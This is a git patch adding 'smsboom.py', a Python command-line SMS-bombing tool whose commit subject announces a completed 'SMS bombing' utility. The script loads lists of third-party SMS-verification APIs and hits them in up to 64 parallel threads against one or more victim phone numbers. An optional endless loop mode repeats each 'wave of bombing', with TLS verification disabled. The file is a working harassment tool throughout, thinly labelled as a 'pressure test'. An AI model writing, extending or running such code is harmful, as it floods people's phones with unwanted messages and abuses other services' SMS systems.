From a63e76f68cbaa086043c71f9af69d4b65877cede Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Sat, 9 Apr 2022 11:48:51 +0800 Subject: [PATCH] =?UTF-8?q?=E2=9C=A8=20feat:=20=E5=AE=8C=E6=88=90=E7=9F=AD?= =?UTF-8?q?=E4=BF=A1=E8=BD=B0=E7=82=B8=E5=91=BD=E4=BB=A4=E8=A1=8C=E5=B7=A5?= =?UTF-8?q?=E5=85=B7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- smsboom.py | 144 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 smsboom.py diff --git a/smsboom.py b/smsboom.py new file mode 100644 index 0000000..921e970 --- /dev/null +++ b/smsboom.py @@ -0,0 +1,144 @@ +# encoding=utf8 +# 短信测压主程序 +import pathlib +import sys +from typing import List, Union +import click +import json +import httpx +from loguru import logger +from queue import Queue +from concurrent.futures import ThreadPoolExecutor +import time + +from utils import API, default_header + +# logger config +logger.remove() +logger.add( + sink=sys.stdout, + format="{time:YYYY-MM-DD at HH:mm:ss} - {level} - {message}", + colorize=True, + backtrace=True +) + +# current directory +path = pathlib.Path(__file__).parent + + +def load_json() -> List[API]: + """load json for api.json + :return: api list + """ + json_path = pathlib.Path(path, 'api.json') + if not json_path.exists(): + logger.error("Json file not exists!") + return None + + with open(json_path.resolve(), mode="r", encoding="utf8") as j: + try: + datas = json.loads(j.read()) + APIs = [ + API(**data) + for data in datas + ] + logger.success(f"api.json 加载完成 接口数:{len(APIs)}") + return APIs + except Exception as why: + logger.error(f"Json file syntax error:{why}") + return None + + +def load_getapi() -> list: + """load GETAPI + :return: + """ + json_path = pathlib.Path(path, 'GETAPI.json') + if not json_path.exists(): + logger.error("GETAPI.json file not exists!") + return None + + with open(json_path.resolve(), mode="r", encoding="utf8") as j: + try: + datas = json.loads(j.read()) + logger.success(f"GETAPI加载完成,数目:{len(datas)}") + return datas + except Exception as why: + logger.error(f"Json file syntax error:{why}") + return None + + +def reqAPI(api: API, client: httpx.Client) -> httpx.Response: + if isinstance(api.data, dict): + resp = client.request(method=api.method, json=api.data, + headers=api.header, url=api.url) + else: + resp = client.request(method=api.method, data=api.data, + headers=api.header, url=api.url) + return resp + + +def req(api: Union[API, str], phone: tuple): + """请求接口方法""" + # 多手机号支持 + if isinstance(phone, tuple): + phone_lst = [_ for _ in phone] + else: + phone_lst = [phone] + + with httpx.Client(headers=default_header, verify=False) as client: + for ph in phone_lst: + try: + if isinstance(api, API): + api = api.handle_API(ph) + resp = reqAPI(api, client) + logger.info(f"{api.desc}-{resp.text[:30]}") + else: + api = api.replace("[phone]", ph) + resp = client.get(url=api, headers=default_header) + logger.info(f"GETAPI接口-{resp.text[:30]}") + except httpx.HTTPError as why: + logger.error(f"{why.request.url}请求失败{why}") + + +@click.command() +@click.option("--thread", "-t", help="线程数(默认64)", default=64) +@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True) +@click.option('--super', "-s", is_flag=True, help="循环模式") +@click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int) +def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False): + """传入线程数和手机号启动轰炸,支持多手机号""" + logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}") + with ThreadPoolExecutor(max_workers=thread) as pool: + i = 0 + if super: + while True: + i += 1 + logger.success(f"第{i}波轰炸开始!") + _api = load_json() + _api_get = load_getapi() + for api in _api: + pool.submit(req, api, phone) + for api_get in _api_get: + pool.submit(req, api_get, phone) + logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....") + time.sleep(interval) + else: + _api = load_json() + _api_get = load_getapi() + for api in _api: + pool.submit(req, api, phone) + for api_get in _api_get: + pool.submit(req, api_get, phone) + + +@click.group() +def cli(): + pass + + +cli.add_command(run) + + +if __name__ == "__main__": + cli()